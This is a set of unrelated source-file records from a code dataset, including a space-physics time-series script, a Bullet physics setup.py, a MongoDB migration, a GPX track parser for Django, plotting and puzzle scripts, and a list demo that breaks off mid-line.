areaMixGrid*energy[:-1,:-1] * flux[:-1,:-1]\n # KeV/cm^2s to mW/m^2 to GW\n hpSouth.append(hp.sum() * 1.6e-21)\n\n # --- Positive current density\n fac = data.read('FAC North [A/m^2]', time)\n fac[fac <= 0] = 0.0\n pfac = areaMixGrid * fac[:-1,:-1]\n ipfacNorth.append(pfac.sum()/1.0e6)\n\n fac = data.read('FAC South [A/m^2]', time)\n fac[fac <= 0] = 0.0\n pfac = areaMixGrid * fac[:-1,:-1]\n ipfacSouth.append(pfac.sum()/1.0e6)\n\n progress.increment()\n except KeyboardInterrupt:\n # Exit when the user hits CTRL+C.\n progress.stop()\n progress.join() \n print('Exiting.')\n import sys\n sys.exit(0)\n except:\n # Cleanup progress bar if something bad happened.\n progress.stop()\n progress.join()\n raise\n progress.stop()\n progress.join()\n\n dataNorth = pyLTR.TimeSeries()\n dataSouth = pyLTR.TimeSeries()\n dataNorth.append('datetime', 'Date & Time', '', timeRange[index0:index1])\n dataSouth.append('datetime', 'Date & Time', '', timeRange[index0:index1])\n dataNorth.append('doy', 'Day of Year', '', t_doy)\n dataSouth.append('doy', 'Day of Year', '', t_doy)\n \n # \"N\" and \"S\" label subscripts are redundant here, potentially leading to\n # mis-labeling of plots\n #dataNorth.append('cpcp', r'$\\Phi_N$', 'kV', cpcpNorth)\n #dataSouth.append('cpcp', r'$\\Phi_S$', 'kV', cpcpSouth)\n #\n #dataNorth.append('hp', r'$HP_N$', 'GW', hpNorth)\n #dataSouth.append('hp', r'$HP_S$', 'GW', hpSouth)\n #\n #dataNorth.append('ipfac', r'$FAC_N$', 'MA', ipfacNorth)\n #dataSouth.append('ipfac', r'$FAC_S$', 'MA', ipfacSouth)\n \n dataNorth.append('cpcp', r'$\\Phi$', 'kV', cpcpNorth)\n dataSouth.append('cpcp', r'$\\Phi$', 'kV', cpcpSouth)\n \n dataNorth.append('hp', r'$HP$', 'GW', hpNorth)\n dataSouth.append('hp', r'$HP$', 'GW', hpSouth)\n \n dataNorth.append('ipfac', r'$FAC$', 'MA', ipfacNorth)\n dataSouth.append('ipfac', r'$FAC$', 'MA', ipfacSouth)\n\n return (dataNorth, dataSouth)\n\nif __name__ == '__main__':\n\n (path, run, t0, t1) = parseArgs()\n\n (dataNorth, dataSouth) = extractQuantities(path, run, t0, t1)\n \n # --- Dump a pickle!\n print('Serializing pyLTR.TimeSeries object of MIX data using the Python 
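# (A quick unit check of the 1.6e-21 hemispheric-power factor used in the loop\n# above: 1 keV = 1.602e-16 J and 1/cm^2 = 1e4/m^2, so keV/cm^2/s times an area\n# in m^2 gives 1.602e-12 W; the extra 1e-9 converts W to GW, i.e. ~1.6e-21.)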
Pickle package.')\n filename = os.path.join(path, 'mixTimeSeries.pkl')\n print(('Writing ' + filename))\n fh = open(filename, 'wb')\n pickle.dump([dataNorth, dataSouth], fh, protocol=2)\n fh.close()\n\n # --- Make a plot of everything\n print('Creating summary plot of MIX time series data.')\n filename = os.path.join(path, 'mixTimeSeries.png')\n print(('Writing ' + filename))\n pyLTR.Graphics.TimeSeries.MultiPlotN([dataNorth, dataSouth], \n 'datetime', ['cpcp', 'hp', 'ipfac'], \n ['r','b'], ['North', 'South'])\n pylab.gcf().autofmt_xdate()\n pylab.title(os.path.join(path, run))\n pylab.savefig(filename,dpi=1200)\n","sub_path":"scripts/mixTimeSeries.py","file_name":"mixTimeSeries.py","file_ext":"py","file_size_in_byte":10425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"133934894","text":"import subprocess\nfrom distutils.core import setup, Extension\n\n\ndef pkgconfig(flag, package):\n p = subprocess.Popen(['pkg-config', flag, package],\n stdout=subprocess.PIPE)\n return p.stdout.read().split()\n\n\nmod = Extension('bulletphysics',\n sources=['src/bulletphysics.cpp',\n 'src/DbvtBroadphase.cpp',\n 'src/DefaultCollisionConfiguration.cpp',\n 'src/CollisionDispatcher.cpp',\n 'src/SequentialImpulseConstraintSolver.cpp',\n 'src/DiscreteDynamicsWorld.cpp',\n 'src/Vector3.cpp',\n 'src/Quaternion.cpp',\n 'src/CollisionShape.cpp',\n 'src/StaticPlaneShape.cpp',\n 'src/SphereShape.cpp',\n 'src/Transform.cpp',\n 'src/DefaultMotionState.cpp',\n 'src/RigidBodyConstructionInfo.cpp',\n 'src/RigidBody.cpp',\n 'src/BoxShape.cpp',\n 'src/PersistentManifold.cpp',\n 'src/VehicleTuning.cpp',\n 'src/WheelInfo.cpp',\n 'src/DefaultVehicleRaycaster.cpp',\n 'src/RaycastVehicle.cpp',\n 'src/CompoundShape.cpp',\n 'src/CylinderShape.cpp',\n ],\n extra_compile_args=pkgconfig('--cflags', 'bullet'),\n extra_link_args=pkgconfig('--libs', 'bullet'))\n\nsetup(\n name='bulletphysics',\n version='0.1',\n description='python wrapper for bulletphysics library',\n ext_modules=[mod],\n author='20tab S.r.l.',\n author_email='info@20tab.com',\n url='https://github.com/20tab/pybulletphysics',\n license='MIT License'\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"349977743","text":"\nword={0:'zero', 1:'one', 2:'two', 3:'three', 4:'four', 5:'five', 6:'six', 7:'seven', 8:'eight', 9:'nine', 10:'ten', 11:'eleven', 12:'twelve', 13:'thirteen', 14:'fourteen', 15:'fifteen', 16:'sixteen', 17:'seventeen', 18:'eighteen', 19:'nineteen', 20:'twenty', 30:'thirty', 40:'forty', 50:'fifty', 60:'sixty', 70:'seventy', 80:'eighty', 90:'ninety', 100:'hundred'}\n\nhundred=100\nten=10\n\ndef aswords(n):\n # Returns a textual description of a number in the range 0..999.\n words = ''\n hundreds = n//hundred\n remainder = n%100\n if hundreds>0:\n words=word[hundreds]+' '+word[hundred]\n if remainder>0:\n words=words+' and '\n if remainder>0:\n if remainder<21:\n words=words+word[n%hundred]\n else:\n tens = remainder//ten\n units = remainder%ten\n words = words+word[tens*ten]\n if units>0:\n words = words+' '+word[units]\n if hundreds==0 and remainder==0:\n words=word[n]\n return words\n","sub_path":"Programs/number_util.py/numberutil.py","file_name":"numberutil.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"229539566","text":"from mongodb_migrations.base 
import BaseMigration\n\n\n########################################################################################################################\n#\n# The sequences are required and have been added to:\n#  - contributors.preprocesses\n#  - coverages.preprocesses\n#  - coverages.environments\n#  - coverages.environments.publication_platforms\n# This migration allows old invalid data to be managed\n#\n########################################################################################################################\n\n\nclass Migration(BaseMigration):\n    def _fix_preprocess_missing_sequence(self, preprocesses):\n        preprocess_without_sequence = [p for p in preprocesses if not p.get(\"sequence\")]\n        for idx_preprocess, preprocess in enumerate(preprocess_without_sequence):\n            preprocess[\"sequence\"] = idx_preprocess\n\n    def _fix_coverage_environments_missing_sequence(self, coverage):\n        envs = coverage.get(\"environments\", {}).items()\n        env_without_sequence = [e for e_name, e in envs if not e.get(\"sequence\")]\n        for idx_env, env in enumerate(env_without_sequence):\n            env[\"sequence\"] = idx_env\n\n        for e_name, env in envs:\n            platform_without_sequence = [p for p in env.get(\"publication_platforms\", []) if not p.get(\"sequence\")]\n            for idx_platform, platform in enumerate(platform_without_sequence):\n                platform[\"sequence\"] = idx_platform\n        return coverage\n\n    def upgrade_coverages(self):\n        all_coverages = self.db[\"coverages\"].find()\n        for coverage in all_coverages:\n            self._fix_preprocess_missing_sequence(coverage.get(\"preprocesses\", []))\n            self._fix_coverage_environments_missing_sequence(coverage)\n            self.db[\"coverages\"].save(coverage)\n\n    def upgrade_contributors(self):\n        all_contributors = self.db[\"contributors\"].find()\n        for contributor in all_contributors:\n            self._fix_preprocess_missing_sequence(contributor.get(\"preprocesses\", []))\n            self.db[\"contributors\"].save(contributor)\n\n    def upgrade(self):\n        self.upgrade_contributors()\n        self.upgrade_coverages()\n","sub_path":"migrations/20170726145800.py","file_name":"20170726145800.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"566736708","text":"# Program to list the Prime Numbers\nfrom functools import reduce\nfor number in range(2,15):\n    # A Prime number will be divisible only by 1 and the number itself\n    # So the Summation of its divisors will be 1 greater than the number\n    # Eg: 7 is divisible by 1 and 7. 
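# (For comparison only -- not the reduce/filter route used below -- a direct\n# divisibility test would be: all(number % d != 0 for d in range(2, number)).)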
Also 7 = (1+7) - 1\n if number == int(reduce(lambda x,y:x+y,list(filter(lambda a: number % a == 0, range(1,number+1))))) - 1:\n print(\"%d is Prime\" %number)\n \n \n\"\"\"\nOutput:\nPython 3.6.1 (default, Dec 2015, 13:05:11)\n[GCC 4.8.2] on linux\n \n2 is Prime\n3 is Prime\n5 is Prime\n7 is Prime\n11 is Prime\n13 is Prime\n\"\"\"","sub_path":"programs/prime_number.py","file_name":"prime_number.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"460420373","text":"# %% Packages\n\nimport os\nimport sys\n\nsys.path.append(\n os.path.join(os.path.join(os.path.dirname(__file__), os.pardir), os.pardir)\n)\n\nimport pickle\nfrom copy import deepcopy\nfrom distutils.spawn import find_executable\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\n\nfrom homeostatic.definitions import level_position\n\nif find_executable(\"latex\"):\n plt.rcParams.update({\"text.usetex\": True})\n plt.rcParams[\"text.latex.preamble\"] = r\"\\usepackage{graphicx}\\usepackage{eucal}\"\nsns.set(font=\"serif\")\nsns.set_style(\"ticks\")\nplt.rcParams[\"font.family\"] = \"serif\"\nplt.rcParams[\"mathtext.fontset\"] = \"dejavuserif\"\n\n# %% Plotting distributions\n\n\nepsilon = 0.0001\nmeans = []\n\nwith open(\"Established/Parameters.bin\", \"rb\") as file:\n load_data = pickle.load(file)\n\n dimension_value = load_data[1]\n max_level_value = load_data[2]\n stimulus_value = load_data[5]\n\n del load_data\n\nall_marginals = []\nall_means = []\n\nfor model in range(2):\n with open(f\"Established/Data-{model + 1}-0.bin\", \"rb\") as file:\n data = pickle.load(file)\n\n captured = 0\n for captured_level in range(len(data)):\n captured += sum(data[captured_level])\n if captured >= 1 - epsilon:\n captured_level += 1\n break\n\n captured_range = captured_level - dimension_value + 1\n\n mean_value = [0, 0]\n distribution = np.zeros((captured_range, captured_range))\n for k in range(distribution.shape[0]):\n for m in range(distribution.shape[1]):\n if k + m <= captured_level:\n distribution[k][m] += data[k + m][\n level_position(\n k + m + dimension_value, dimension_value, [k + 1, m + 1]\n )\n ]\n mean_value[0] += (k + 1) * distribution[k][m]\n mean_value[1] += (m + 1) * distribution[k][m]\n\n marginals = [np.zeros(captured_range), np.zeros(captured_range)]\n for k in range(distribution.shape[0]):\n for m in range(distribution.shape[1]):\n marginals[0][k] += distribution[k, m]\n marginals[1][m] += distribution[k, m]\n\n means.append(mean_value)\n\n all_marginals.append(deepcopy(marginals))\n all_means.append(deepcopy(means))\n\n fig, graph = plt.subplots(1, 1, constrained_layout=True)\n\n ticks = np.arange(-1, 18, 5)\n ticks[0] = 0\n\n h_map = graph.imshow(distribution, cmap=\"Greens\", interpolation=\"none\")\n c_bar = fig.colorbar(h_map)\n c_bar.outline.set_visible(False)\n graph.plot(mean_value[0] - 1, mean_value[1] - 1, \"^\", color=\"blue\", ms=10)\n graph.set_facecolor(\"white\")\n graph.spines[\"bottom\"].set_color(\"white\")\n graph.spines[\"top\"].set_color(\"white\")\n graph.spines[\"right\"].set_color(\"white\")\n graph.spines[\"left\"].set_color(\"white\")\n graph.set_xlabel(\"$n_{2}$\")\n graph.set_ylabel(\"$n_{3}$\")\n graph.set_xlim(-0.5, 17.5)\n graph.set_ylim(-0.5, 17.5)\n graph.set_xticks(ticks)\n graph.set_xticklabels(ticks + 1)\n graph.set_yticks(ticks)\n graph.set_yticklabels(ticks + 1, rotation=90)\n plt.title(\"QSD approximation using $\\\\mathcal{X}^{\" + f\"({model + 1})\" + 
\"}$\")\n\n fig.savefig(f\"QSD-2-clones-{model + 1}.pdf\")\n\n graph.clear()\n fig.clear()\n plt.close(fig=\"all\")\n\n\nwith open(\"Established/Gillespie/Data.bin\", \"rb\") as file:\n data = pickle.load(file)\n\nmarginal_g1 = np.zeros(179)\nmarginal_g2 = np.zeros(179)\nfor i in range(data.shape[0]):\n for j in range(data.shape[1]):\n marginal_g1[i] += data[i, j]\n marginal_g2[j] += data[i, j]\n\nmarginal_g1 = marginal_g1 / marginal_g1.sum()\nmarginal_g2 = marginal_g2 / marginal_g2.sum()\n\nfig, graph = plt.subplots(1, 1, constrained_layout=True, figsize=(4.5, 3.5))\n\nwidth = 0.25\nticks = np.arange(0, 18)\nticks_1 = np.arange(0, all_marginals[0][0].shape[0])\nticks_2 = np.arange(0, all_marginals[1][0].shape[0])\nticks_g = np.arange(0, marginal_g1.shape[0])\nbars_1 = graph.bar(\n ticks_1 - (3 / 2) * width,\n all_marginals[0][0],\n width,\n label=\"$\\\\mathcal{X}^{(1)}$\",\n color=\"Green\",\n linewidth=0.8,\n)\ngill = graph.bar(\n ticks_g - width / 2,\n marginal_g1,\n width,\n label=\"$\\\\textrm{Gillespie}$\",\n color=\"red\",\n linewidth=0.8,\n)\nbars_2s = graph.bar(\n ticks_2 - 1 + width / 2,\n all_marginals[1][0],\n width,\n label=\"$\\\\textrm{Shifted } \\\\mathcal{X}^{(2)}$\",\n color=\"blue\",\n hatch=\"///\",\n linewidth=0.8,\n)\nbars_2 = graph.bar(\n ticks_2 + (3 / 2) * width,\n all_marginals[1][0],\n width,\n label=\"$\\\\mathcal{X}^{(2)}$\",\n color=\"blue\",\n linewidth=0.8,\n)\ngraph.set_xticks(ticks)\ngraph.set_xticklabels(ticks + 1)\ngraph.set_xlim(-1, 18)\ngraph.set_ylim(0, 0.2)\ngraph.legend(loc=\"upper right\")\ngraph.set_xlabel(\"$n_{2}$\")\ngraph.set_title(\"$\\\\textrm{Marginal distribution of } n_{2}$\")\n\nfig.savefig(\"QSD-2-clones-n2.pdf\")\nfig.clear()\nplt.close(fig=\"all\")\n\nfig, graph = plt.subplots(1, 1, constrained_layout=True, figsize=(4.5, 3.5))\n\nwidth = 0.25\nticks = np.arange(0, 18)\nticks_1 = np.arange(0, all_marginals[0][1].shape[0])\nticks_2 = np.arange(0, all_marginals[1][1].shape[0])\nticks_g = np.arange(0, marginal_g2.shape[0])\nbars_1 = graph.bar(\n ticks_1 - (3 / 2) * width,\n all_marginals[0][1],\n width,\n label=\"$\\\\mathcal{X}^{(1)}$\",\n color=\"Green\",\n linewidth=0.8,\n)\ngill = graph.bar(\n ticks_g - width / 2,\n marginal_g2,\n width,\n label=\"$\\\\textrm{Gillespie}$\",\n color=\"red\",\n linewidth=0.8,\n)\nbars_2s = graph.bar(\n ticks_2 - 1 + width / 2,\n all_marginals[1][1],\n width,\n label=\"$\\\\textrm{Shifted } \\\\mathcal{X}^{(2)}$\",\n color=\"blue\",\n hatch=\"///\",\n linewidth=0.8,\n)\nbars_2 = graph.bar(\n ticks_2 + (3 / 2) * width,\n all_marginals[1][1],\n width,\n label=\"$\\\\mathcal{X}^{(2)}$\",\n color=\"blue\",\n linewidth=0.8,\n)\ngraph.set_xticks(ticks)\ngraph.set_xticklabels(ticks + 1)\ngraph.set_xlim(-1, 18)\ngraph.set_ylim(0, 0.2)\ngraph.legend(loc=\"upper right\")\ngraph.set_xlabel(\"$n_{3}$\")\ngraph.set_title(\"$\\\\textrm{Marginal distribution of } n_{3}$\")\n\nfig.savefig(\"QSD-2-clones-n3.pdf\")\nfig.clear()\nplt.close(fig=\"all\")\n\n\nwith open(\"Established/Means.bin\", \"wb\") as file:\n pickle.dump(means, file)\n","sub_path":"Results/QSD/QSD-plots-established.py","file_name":"QSD-plots-established.py","file_ext":"py","file_size_in_byte":6169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"246837148","text":"# coding: utf-8\n\nimport sys\nimport codecs\n\nsys.stdin = codecs.getreader('cp932')(sys.stdin)\nsys.stdout = codecs.getwriter('cp932')(sys.stdout)\n\nCARD_MAX = 7\ncard = []\nboard = []\ncount = 0\n\n\ndef main():\n i = 0\n while i < 
CARD_MAX:\n        i = i + 1\n        card.append(i)\n        board.append(0)\n        board.append(0)\n    print(str(board), str(card))\n\n    search(1)\n\n\ndef search(z):\n    global count\n    for i in card:\n        if (i != 0):\n            # this card is not used yet\n            pos = nextPos()\n            if (pos != -1):\n                if (setCard(i, pos)):\n                    if (nextPos() == -1):\n                        count = count + 1\n                        print(str(count).rjust(2), board)\n                    else:\n                        search(z + 1)\n                    rsetCard(i, pos)\n\n\ndef nextPos():\n    i = 0\n    while board[i] != 0:\n        i = i + 1\n        if (len(board) <= i):\n            return -1\n    return i\n\n\ndef setCard(num, pos):\n    p1 = pos\n    p2 = pos + num + 1\n    if (len(board) > p2 and board[p1] == 0 and board[p2] == 0):\n        card[num - 1] = 0\n        board[p1] = num\n        board[p2] = num\n        return True\n    else:\n        return False\n\n\ndef rsetCard(num, pos):\n    p1 = pos\n    p2 = pos + num + 1\n\n    card[num - 1] = num\n    board[p1] = 0\n    board[p2] = 0\n\n\nmain()\n","sub_path":"Python/Card.py","file_name":"Card.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"83458372","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# __author__: Ace.\n# __remark__: \n\nimport os\nimport time\n\nfrom lxml import objectify\nfrom lxml.objectify import ObjectifiedElement\n\nclass BaseGenerator(object):\n    \"\"\" remark \"\"\"\n    REAL_PATH_HEAD = None\n\n    _BG_LANGUAGE = 'PythonDemo'\n    _XML_ZIP_STRING = ''\n\n    def __init__(self):\n        \"\"\" remark \"\"\"\n        self._obj = None\n        pass\n\n    def __lxml_objectify(self, name, author):\n        \"\"\" remark \"\"\"\n        if not self._XML_ZIP_STRING:\n            raise Exception('xml is none.')\n\n        xmls = self._XML_ZIP_STRING\n        xmls = xmls.replace('@templ', name)\n        xmls = xmls.replace('templ', name)\n        xmls = xmls.replace('@author', author)\n\n        dt = time.strftime(\"%Y.%m.%d\")\n        xmls = xmls.replace('@time', dt)\n\n        return objectify.fromstring(xmls)\n\n    def __mkdir_all_folders(self, obj):\n        \"\"\" remark \"\"\"\n        if not hasattr(obj, 'pnodes'):\n            tree = path = obj.attrib['name']\n        else:\n            tree = path = '%s/%s' % (obj.pnodes, obj.attrib['name'])\n\n        if self.REAL_PATH_HEAD:\n            path = self.REAL_PATH_HEAD + path\n\n        if not os.path.exists(path):\n            os.mkdir(path)\n            print('[%s] folder is created.' % obj.attrib['name'])\n        else:\n            print('[%s] folder already exists.' % obj.attrib['name'])\n\n        return tree, path\n\n    def __mkfile_all_files(self, obj, path):\n        \"\"\" remark \"\"\"\n        if not hasattr(obj, 'file'): return\n\n        for file in obj.file:\n            fpath = '%s/%s' % (path, file.attrib['name'])\n            if os.path.isfile(fpath):\n                print('[%s] file already exists.' % file.attrib['name'])\n                continue\n\n            with open(fpath, 'w+') as fw:\n                for line in file.line:\n                    if line.text:\n                        val = str(line.text).strip()\n                        # dict.has_key() was removed in Python 3; use the in operator\n                        if 'under' in line.attrib:\n                            val = val.replace('-', '_')\n                    else:\n                        val = ''\n\n                    if 'indent' in line.attrib:\n                        num = int(line.attrib['indent'])\n                        indent = ['\\t' for _ in range(num)]\n                        txt = ''.join(indent) + val + '\\n'\n                    else:\n                        txt = val + '\\n'\n\n                    fw.write(txt)\n\n            print('[%s] file is created.' 
% file.attrib['name'])\n\n    def _travers(self, obj):\n        \"\"\" remark \"\"\"\n        tree, path = self.__mkdir_all_folders(obj)\n        self.__mkfile_all_files(obj, path)\n\n        if not hasattr(obj, 'folder'):\n            return\n\n        for folder in obj.folder:\n            if hasattr(obj, 'pnodes'):\n                folder.pnodes = tree\n            else:\n                folder.pnodes = obj.attrib['name']\n            self._travers(folder)\n\n    def _notify(self):\n        \"\"\" remark \"\"\"\n        print('\\nall done.')\n\n    @classmethod\n    def suitable(cls, language):\n        \"\"\" remark \"\"\"\n        return cls._BG_LANGUAGE == language\n\n    def doc_for_templ(self):\n        \"\"\" remark \"\"\"\n        pass\n\n    def produce_all(self, name, author):\n        \"\"\" remark \"\"\"\n        obj = self.__lxml_objectify(name, author)\n\n        if not isinstance(obj, ObjectifiedElement):\n            raise Exception('xml objectify error.')\n        else:\n            print('templ is loaded.')\n\n        self._travers(obj)\n        self._notify()\n        \n        print('\\nstructure_for %s --doc-for-templ' % self._BG_LANGUAGE)\n        print('it will show the purpose of each file.')","sub_path":"structure_for/generator/_basic.py","file_name":"_basic.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"579318665","text":"from xml.etree import cElementTree as ElementTree\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.contrib.gis.measure import Distance\nimport datetime\nfrom django.db import transaction\nfrom tracklog.models import *\nfrom django.contrib.gis.geos import Point\t# For instantiating point objects\nfrom math import pow, sqrt\nfrom tracklog.analyze import Analyze\n\n\n\n# example command to parse a trace: parsegpx.parse(file('/media/DATA/OmiaOhjelmia/Korkeusmalli/Malli/korkeus/data/EspKeskpuistoLyh.gpx'), 'Keskuspuisto', User.objects.get(username='kiikonen'))\n\n# TODO: multiple gpx-files into one Trip instance by appending!\n\n\n# The formatDate() function transforms the date string to the correct format for the save() function. Returns a string in the correct format.\n#correct format 'YYYY-MM-DD HH:MM:SS'. In gpx it is like '2010-09-25T06:14:35Z'\ndef formatDate(gpxdate):\n\t# Remove Z from the end of the datestring\n\tgpxdate = gpxdate.strip('Z')\n\n\ttry:\n\t\tdateobject = datetime.datetime.strptime(gpxdate, '%Y-%m-%dT%H:%M:%S')\n\n\t\tformatteddate = dateobject.strftime('%Y-%m-%d %H:%M:%S')\n\n\texcept Exception:\n\t\traise DatetimeException() \n\t\t\n\treturn formatteddate\n\n\n# The formatPrefix() function transforms the version number string into an element tag name prefix. 
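For example, version '1.1' yields the prefix '{http://www.topografix.com/GPX/1/1}'. 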
Returns a string, which will appear in the tag names so the right tag can be found.\n# Tag prefix is like: '{http://path/number/another_number}'\ndef formatPrefix(version):\n\n\tversionnumbers = version.split('.')\n\n\tprefix = '{http://www.topografix.com/GPX/%(first)s/%(second)s}' % {'first':versionnumbers[0], 'second':versionnumbers[1]}\n\n\treturn prefix\n\n\n# Returns a DEM elevation from the database that is nearest to the given point location\n# Deprecated!\ndef getClosestDEMElevationOLD(p=None):\n\n\tpt = p.transform(ct=3067, clone=True)\n\n\tnearPoints = DEMPoint.objects.filter(geom__distance_lt=(pt, 8))\n\n\tnearElevs = [i.z for i in nearPoints]\n\n\tnumOfPoints = len(list(nearElevs))\n\n\t# If multiple points, calculate mean elevation\n\tif numOfPoints > 1:\n\t\televSum = 0\n\t\tfor i in nearElevs:\n\t\t\televSum += i\n\n\t\treturn elevSum / numOfPoints\n\n\t# If only one point, return its elevation\n\telif numOfPoints == 1:\n\t\treturn nearElevs[0]\n\n\"\"\"\ndef getClosestDEMElevation(p=None):\n\n\tpt = p.transform(ct=3067, clone=True)\n\n\t\t# Build the primary key (xy) of the DEMPoint that is to be searched\n\n\tx = int(pt.x)\n\ty = int(pt.y)\n\n\t# Round x and y to the tens of meters\n\tx = roundToTens(x)\n\ty = roundToTens(y)\n\n\txy = x.__str__() + y.__str__()\n\n\tpointList = DEMPoint.objects.filter(pk=xy)\n\n\tif len(pointList) > 0:\n\t\treturn pointList[0].z\n\telse:\n\t\treturn None\n\n\"\"\"\n\n# Rounds a given integer to the accuracy of tens\ndef roundToTens(i):\n\tif (i % 10) < 5:\n\t\ti = i - (i % 10)\n\telif (i % 10) >= 5:\n\t\ti = i + (10 - i % 10)\n\treturn i\n\n\n# The parse() function is given the file, trip name and user as parameters.\n@transaction.commit_manually\ndef parse(f=None, name=None, user=None):\n\n\t# If a point doesn't have elevation information, its elevation will be the constant NO_ELEVATION\n\tNO_ELEVATION = 9999\n\n\tif f is None:\t# If the file is not given\n\t\treturn None\t\t#!!! An exception could be thrown?\n\n\telse:\n\t\t# Variables for the tree and the root of the tree\n\t\ttree = ElementTree.parse(f)\n\t\troot = tree.getroot()\n\n\t\t# Get the version of the gpx and form the prefix for the tag names\n\t\tversion = root.get('version')\n\t\tprefix = formatPrefix(version)\n\t\t# From now on, tag names are formed with \"prefix+'tagname'\"\n\n\t\t# Dive into track segments. 
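In gpx, a <trk> element holds one or more <trkseg> children. 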
Segments contain trackpoints.\n\t\tsegments = root.find(prefix+'trk').findall(prefix+'trkseg')\n\n\t\t# Take the date for the trip from the first trackpoint in the gpx\n\t\ttripdate = formatDate(segments[0][0].find(prefix+'time').text)\n\n\t\t# Save Data and Trip instances to the database\n\t\ttrip = Trip(name=name, date=tripdate, user = user)\n\t\ttrip.save()\n\n\t\tdata = Data(date=datetime.datetime.now(), trip=trip, data_type=Data.RAW)\n\t\tdata.save()\n\t\t\n\t\t# Elevation corrected data\n\t\teleCorrData = Data(date=datetime.datetime.now(), trip=trip, data_type=Data.ELECORR)\n\t\teleCorrData.save()\n\n\t\ttransaction.commit()\n\n\t\t# Prepare the point saving loop\n\t\tn = 1\n\n\t\t# Variables for the cumulative value calculation\n\t\tcumdist = 0\n\t\tprevpoint = None\n\n\t\tcumtime = 0\n\t\tprevtime = datetime.datetime.strptime(tripdate, '%Y-%m-%d %H:%M:%S')\n\t\tspeed=0\n\n\t\tfor s in segments:\n\t\t\tfor p in s:\t# For every point in the current segment\n\t\t\t\t# Pick the coordinates, elevation and time\n\t\t\t\tx = p.attrib['lon']\n\t\t\t\ty = p.attrib['lat']\n\n\t\t\t\t# Initial previous point\n\t\t\t\tif prevpoint is None:\n\t\t\t\t\tprevpoint = Point(float(x), float(y), srid=4326)\n\n\t\t\t\t# Find elevation from gps-trace\n\t\t\t\televation = p.find(prefix+'ele')\n\t\t\t\tif elevation is not None:\n\t\t\t\t\televation = float(elevation.text)\n\t\t\t\telse:\n\t\t\t\t\televation = float(NO_ELEVATION)\n\n\t\t\t\ttime = formatDate(p.find(prefix+'time').text)\n\n\t\t\t\t# Update cumulative time\n\t\t\t\tdt= (datetime.datetime.strptime(time, '%Y-%m-%d %H:%M:%S') - prevtime).seconds\n\t\t\t\tcumtime = cumtime + dt\n\n\t\t\t\t# Update prevtime\n\t\t\t\tprevtime = datetime.datetime.strptime(time, '%Y-%m-%d %H:%M:%S')\n\n\t\t\t\tpointGeom = Point(float(x), float(y), srid=4326)\n\n\t\t\t\t# Update cumulative distance\n\t\t\t\ta = pointGeom.transform(ct=3067, clone=True).coords\n\t\t\t\tb = prevpoint.transform(ct=3067, clone=True).coords\n\n\t\t\t\tdist = sqrt(pow(a[0]-b[0],2)+pow(a[1]-b[1],2))\n\t\t\t\n\t\t\t\tcumdist = cumdist + dist\n\t\t\t\tif dt != 0:\n\t\t\t\t\tspeed= abs(dist/dt)\n\n\t\t\t\t# Update prevpoint\n\t\t\t\tprevpoint = pointGeom\n\n\t\t\t\t# Instantiate the trackpoint and save it\n\t\t\t\tpoint = TrackPoint(ele=elevation, time=time, data=data, n=n, geom=pointGeom, cumtime=cumtime, cumdist=cumdist, speedFromPrevpoint=speed)\n\n\t\t\t\tpoint.save()\n\n\t\t\t\t\"\"\"# Instantiate the elevation corrected point and save it\n\t\t\t\tcorrEle = DEMPoint.closestDEMElevation(p=pointGeom)\n\n\t\t\t\tif corrEle is None:\n\t\t\t\t\tcorrEle = float(NO_ELEVATION)\n\n\t\t\t\tpoint = TrackPoint(ele=corrEle, time=time, data=eleCorrData, n=n, geom=pointGeom, cumtime=cumtime, cumdist=cumdist)\n\n\t\t\t\tpoint.save()\"\"\"\n\n\t\t\t\tn += 1\n\t\tdata.ready= True\n\t\tdata.save()\n\n\t\ttransaction.commit()\n\n\t\ttr=Analyze()\n\t\ttr.setTrip(trip)\n\t\tif settings.ON_OPENSHIFT:\n\t\t\ttr.start()\n\t\telse:\n\t\t\ttr.analyze()\n\n\t\n\nclass DatetimeException(Exception):\n\n\tpass\n","sub_path":"tracklog/parsegpx.py","file_name":"parsegpx.py","file_ext":"py","file_size_in_byte":6191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"394811521","text":"# Global variable\na=[1,2,3,4,5]\ndef li_demo():\n    print()\nif __name__ == '__main__':\n    print(a)\n# Local variable\ndef li_demo():\n    print()\nif __name__ == '__main__':\n    a = [1, 2, 3, 4, 5]\n    print(a)\n# Method to get a list's length: len()\ndef list_demo():\n    print(clist)\nif __name__ == '__main__':\n    clist = [1, 5, 6, 7]\n    
